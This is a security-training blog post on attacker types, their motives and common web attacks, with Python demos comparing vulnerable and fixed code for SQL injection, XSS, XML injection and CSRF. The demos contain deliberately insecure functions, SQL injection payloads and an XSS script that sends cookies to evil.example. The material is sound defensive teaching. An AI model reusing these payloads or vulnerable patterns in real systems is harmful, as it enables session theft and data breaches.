Defence against the black hat - Know the enemy

This blog post is a write-up of the first of a series of security training sessions that I have presented at my work, titled "Know the enemy". In this session we covered the following:

- Who is the enemy?
- Why do they attack?
- The types of attacks they use

# Who is the enemy?

In the world of application security there are many different groups of people who can be considered attackers, or "the enemy" as they are dubbed in this training. The groups highlighted in the training were:

- Criminals
- Governments
- Competitors
- Employees
- Activists and disruptors
- Researchers

## Criminals

The criminal group is probably the first one you would think of when you picture someone attacking your software. Depending on your definition of criminal, it could also include most if not all of the other groups. For this training, though, criminals are organised groups of people who carry out illegal actions to gain wealth. This group has been growing, especially over the last ten years, helped by the creation of cryptocurrency, which removes or reduces the ability of authorities such as police or federal agencies to track the money gained from attacking applications.

## Governments

Since the creation of the computer it has been a growing concern for governments that information and secrets could, and would, be lost through the use of technology. This has led to an arms race in which governments not only protect against and deter hackers and spies, but also equip their own militaries and intelligence agencies with the ability to attack and defend. Today every superpower in the world is at war in cyberspace. These wars are not formally declared, but every day millions of attacks are sent from country to country in an attempt to find any small breach in a nation's infrastructure that could be used or leveraged.
A good visual for this can be seen [here](

Some governments have also been helping businesses and citizens to protect themselves and their customers by running schemes such as the Australian government funding penetration testing for small to medium businesses.

## Competitors

Although illegal in most jurisdictions around the world, industrial espionage and sabotage have been known to be carried out by competitors, or in some cases their law firms. This can give a competitor the upper hand by gathering details of customers or information about future developments. A competitor could also deface or tamper with a rival's products so that confidence in the product or company is lost.

## Employees

Current or past employees could be the perpetrators of an attack. There are many reasons this might happen, but because employees have had access to confidential information (and often still hold valid credentials and knowledge of internal systems), they are among the best placed and best informed attackers we can come across.

## Activists and disruptors

This group is generally driven by altruistic causes and usually has a mission or message it wishes to spread. These attackers often target businesses that carry out activities some part of society sees as wrong. They generally attack either to stop that sort of business being carried out, or to find information that proves illegal or immoral practices are taking place.

## Researchers

There is a growing number of people in the world whose job it is to find vulnerabilities in software and either report them or write papers about them. This group's growth has been helped by grants and schemes created by governments and businesses that allow people to be paid for finding these kinds of issues. In 2019 several people were paid over US$1,000,000 each for finding a single issue, becoming millionaires overnight.
Google has also expanded its scheme so that it will pay people who find and responsibly disclose issues in any app in the Play Store with more than 100 million installs. This group also includes penetration testers, who are paid to carry out attacks against you, generally by you or your company.

# Why are they attacking?

Some of the reasons for an attacker to attack have been touched on above, but the ones we highlighted in training are:

- Profit
- Political
- Reputation
- Legal

Although there are other reasons, these generic terms cover most of them at a top level.

## Profit

Profit can be gained by attacking software; this can come from legal or illegal sources. The groups we would consider to be driven by this motive are:

- Criminals
- Competitors
- Employees
- Researchers

There are many ways in which an attacker might profit from an attack, but some of the more common are selling data, working under contract (such as hackers for hire) or taking part in schemes (such as bug bounties).

## Political

As software takes over every part of our lives, the political impact of a security failure increases. From governments tracking dissidents and terrorists to activists uncovering illegal activities by governments and companies, the zeitgeist can be changed by attacks driven by this motive. Also, as elections are increasingly digitised throughout the world, the impact of attacks on these systems could lead to a political crisis like no other. The main groups driven by this would be:

- Governments
- Activists and disruptors

## Reputation

The reputation of a company or its products can be affected by an attack for several reasons, such as a data leak or defacement of the application. Reputational damage can be long-lasting and can lead to loss of business, especially in a world where news lasts forever and is easy to search for and find.
The main groups driven by this would be:

- Competitors
- Employees
- Activists and disruptors

## Legal

The legal implications of an attack on a company or its products have always been a concern, but since 25 May 2018 protecting customer data has become a much bigger concern for companies because of the enforcement of GDPR, which allows EU regulators to fine a company up to 20,000,000 Euro or 4% of annual worldwide turnover for a data breach, whichever is higher. There are lots of other legal issues that would be raised by a breach, such as insurance claims and contractual failings. The main groups that would focus on this are:

- Governments
- Competitors
- Activists and disruptors

# The types of attacks they use

Finally, in training we covered the types of attacks an attacker might use. These are not the only types of attacks, but they are some of the common ones generally used against a web application. The types we highlighted are:

- SQL injection
- Cross-site scripting (XSS)
- XML injection (XXE)
- Social engineering
- Man/Monster in the middle
- Cross-site request forgery (CSRF)
- Denial of service (DoS/DDoS)
- Credential gathering

We talked briefly about each of these and the kinds of outcomes they can lead to. More sessions will be held on these types of attacks in the future, so full details will be covered then.

## SQL injection

This is probably the first or second attack type you would think of if you were asked to name some security vulnerabilities. It occurs when user-supplied input is concatenated into a query, allowing an attacker to run their own SQL against the databases the application is connected to. This can let them create, read, update or delete the stored data. The results of this sort of attack can include data loss or leaks, compromised access to the application, corruption of data and, in some cases, illegal activity being carried out using corporate infrastructure.
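As an added example (not code from the original training material), the following Python snippet uses an in-memory SQLite database with constructed sample users to show a login query built by string concatenation beside the parameterised version. The table, user names and passwords are made up for the demo; passwords are stored in plain text only to keep the example short, which is itself something you would never do in a real application.

```python
import sqlite3

# Constructed sample data for the demo; not taken from any real system.
SAMPLE_USERS = [
    ("alice", "correct horse battery staple"),
    ("bob", "hunter2"),
]


def make_db():
    """Create an in-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by concatenation, so attacker-controlled quotes and
    operators become part of the query rather than data being compared."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values separately from the
    SQL text, so the input can only ever be compared as a literal string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Classic tautology payload: the WHERE clause becomes
    #   username = 'alice' AND password = '' OR '1'='1'
    # which is true for every row, so the password check is bypassed.
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, "alice", payload))
    print("safe:      ", login_safe(db, "alice", payload))
    # Comment payload in the username: everything after -- is ignored,
    # so the password is never checked at all.
    print("vulnerable:", login_vulnerable(db, "' OR 1=1 --", "anything"))
    print("safe:      ", login_safe(db, "' OR 1=1 --", "anything"))
```

The parameterised version needs no input validation to be safe from injection because the database never parses the value as SQL; validation is still worth doing for other reasons, but it is not the injection defence.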
## Cross-site scripting (XSS)

This is another type of attack that people are very aware of. It allows an attacker to inject client-side script into a page that a legitimate user's browser renders, where it runs with that user's session and can perform actions as the user. This can lead to data leaks or data loss; it can also allow an attacker to steal the user's login session, as well as other actions being taken on the user's behalf.

## XML injection

This sort of attack puts attacker-controlled data into an XML document or process so that it either stops working correctly or operates on incorrect data. It can be used to change the behaviour of an application or the data it shows. The results of an attack like this can range from a product becoming unusable to it acting as an entry point for more sophisticated attacks.

## Social engineering

Social engineering is a growing attack vector, as it requires little if any technical knowledge and can be used to gain access to a product. It can be used to get access to a system, or to get information about a system or company. Depending on the targets of a social engineering attack the results vary; at worst an attacker might gain access to an admin account and the ability to change data.

## Man/Monster in the middle

This attack requires the attacker to sit between the victim and the product and intercept the messages between the two. It is hard to pull off against everyone generically, but against a targeted victim it can be very easy. Depending on the attacker's resources, different levels of data can be gathered, from usernames and passwords to private information.

## Cross-site request forgery (CSRF)

This attack allows an attacker to send requests to the product as if they came from a legitimate user. It is generally done from another site that targets are either directed to or would naturally visit, and it works because the browser attaches the user's session cookie to the request automatically, so the product believes a legitimate customer has acted.
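Both XSS and XML injection above come down to the same mistake: untrusted text is pasted into markup that something else will parse. The following Python example is added here and is not part of the training material; the comment text, user name and role are constructed for the demo. It shows an HTML comment renderer and an XML builder with and without output encoding, and a small consumer that parses the XML the way a downstream service would.

```python
import html
import xml.etree.ElementTree as ET

# Constructed attacker inputs for the demo.
XSS_PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
XML_PAYLOAD = "guest</role><role>admin"


def render_comment_vulnerable(comment):
    """Interpolates user text straight into HTML: a <script> tag in a stored
    comment runs in the browser of every visitor who views the page."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment):
    """HTML-encodes the text so the browser shows the tags as literal
    characters instead of executing them."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def build_user_xml_vulnerable(name, role):
    """String-builds XML: a '</role><role>' in the input closes the real
    element and opens a second one that the consumer will also honour."""
    return "<user><name>" + name + "</name><role>" + role + "</role></user>"


def build_user_xml_safe(name, role):
    """Builds a tree with ElementTree, which escapes '<', '>' and '&' in
    text content when it serialises, so the input stays a single value."""
    user = ET.Element("user")
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "role").text = role
    return ET.tostring(user, encoding="unicode")


def roles_in(doc):
    """What a downstream consumer would see: every <role> in the document."""
    return [r.text for r in ET.fromstring(doc).iter("role")]


if __name__ == "__main__":
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_safe(XSS_PAYLOAD))
    print(roles_in(build_user_xml_vulnerable("mallory", XML_PAYLOAD)))  # two roles
    print(roles_in(build_user_xml_safe("mallory", XML_PAYLOAD)))        # one role
```

The encoding has to match the context the text lands in (HTML body, HTML attribute, XML text node, JavaScript string), which is why a templating engine that escapes by default is preferable to remembering to call an escape function at every output point.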
This can lead to data leaks or data loss, and it is a natural attack to carry out when a product has not implemented the correct protections, such as anti-CSRF tokens.

## Denial of service (DoS/DDoS)

A denial of service attack, or its distributed form (DDoS), is probably something you know about or have heard of; it makes a product inaccessible or unusable by anyone by exhausting its capacity. This can lead to reputational damage and customers moving to other solutions.

## Credential gathering

This type of attack focuses on trying to gain access to a system, or on gathering information about the users of a product, for example by phishing, credential stuffing with leaked password lists or brute forcing logins. The results of this kind of attack are user logins being compromised or customer details being leaked.
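As an added example of the "correct protections" for CSRF mentioned above (not code from the original training), the following Python snippet models two request handlers for a money transfer. The request dictionaries, session identifier and server secret are constructed for the demo. The vulnerable handler trusts the session cookie alone; the safe handler also requires a per-session token, derived as an HMAC of the session identifier, that a page on another origin cannot read and therefore cannot include in a forged form.

```python
import hashlib
import hmac
import secrets

# Assumed server-side secret; in a real deployment it would come from
# configuration or a key store, not be generated at import time.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id):
    """Per-session token = HMAC(secret, session_id). The server embeds it in
    its own forms as a hidden field; attacker.example cannot read it because
    the same-origin policy stops it reading pages from the victim site."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _do_transfer(form):
    return f"transferred {form['amount']} to {form['to']}"


def handle_transfer_vulnerable(request):
    """Accepts any request that carries a session cookie. The browser sends
    cookies regardless of which page triggered the request, so a form
    auto-submitted from another site is accepted."""
    if request.get("cookie_session") is None:
        return "rejected: not logged in"
    return _do_transfer(request["form"])


def handle_transfer_safe(request):
    """Additionally requires the form to carry the token for this session,
    compared in constant time."""
    session = request.get("cookie_session")
    if session is None:
        return "rejected: not logged in"
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted, csrf_token(session)):
        return "rejected: missing or invalid CSRF token"
    return _do_transfer(request["form"])


# Constructed requests. Both carry the victim's session cookie because the
# browser attaches it automatically; only the legitimate one has the token.
LEGIT_REQUEST = {
    "cookie_session": "sess-1234",
    "form": {"amount": "10", "to": "savings", "csrf_token": csrf_token("sess-1234")},
}
FORGED_REQUEST = {  # hidden form auto-submitted by a page on attacker.example
    "cookie_session": "sess-1234",
    "form": {"amount": "5000", "to": "attacker"},
}
FORGED_WITH_OWN_TOKEN = {  # attacker reuses a token from their own session
    "cookie_session": "sess-1234",
    "form": {"amount": "5000", "to": "attacker", "csrf_token": csrf_token("sess-9999")},
}

if __name__ == "__main__":
    print("vulnerable, forged:", handle_transfer_vulnerable(FORGED_REQUEST))
    print("safe, forged:      ", handle_transfer_safe(FORGED_REQUEST))
    print("safe, wrong token: ", handle_transfer_safe(FORGED_WITH_OWN_TOKEN))
    print("safe, legitimate:  ", handle_transfer_safe(LEGIT_REQUEST))
```

Binding the token to the session is what defeats the third request: a token the attacker obtained from their own account is valid for their session but not the victim's. Marking the session cookie `SameSite=Lax` or `Strict` is a useful second layer, but the token check is the one that does not depend on browser behaviour.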